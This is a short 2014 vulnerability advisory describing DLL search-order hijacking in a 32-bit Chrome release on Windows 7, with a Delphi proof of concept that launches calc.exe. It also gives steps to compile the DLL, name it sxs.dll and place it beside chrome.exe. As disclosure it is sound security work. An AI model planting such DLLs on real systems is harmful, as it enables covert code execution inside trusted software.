# google chrom latest Version 34.0.1847.131 m 32-bit DLL Order Hijacking # ########################### # # Exploit Title: [google chrom Version 34.0.1847.131 m 32-bit DLL Order Hijacking ] # Date: [2014/04/25] # Exploit Author: [Aryan Bayaninejad] # Linkedin : https://www.linkedin.com/profile/view?id=276969082 # Vendor Homepage: [http://www.chromium.org/] # Software Link: [http://www.filehorse.com/download-google-chrome/] # Version: [Version 34.0.1847.116 32-bit ] # Tested on: [Windows 7 Ultimate - 32bit] # ########################### details: Untrusted search path vulnerability in chrom latest version [34.0.1847.131] when running on Windows 7 32bit ,allows local users and possibly remote attackers to gain privileges via a Trojan horse DLL in the current working directory by sxs.dll it's a DLL Order Hijacking that let me to execute arbitrary code beside google chrome latest version of Chrome suffers from Load Order Hijacking of "Sxs.dll" library, I attached a proof of concept code that will runs besides your google chrome if you put it beside chrome.exe & it works like a charm & will execute calc . uses Windows; begin Winexec(PAnsichar('C:\WINDOWS\system32\calc.exe'),sw_show); end. Compile Above Source Code With Delphi And Rename Compiled DLL To sxs.dll Then Copy It To The chrom Installed Path, Now If You Run The chrom now DLL Will Hijacked!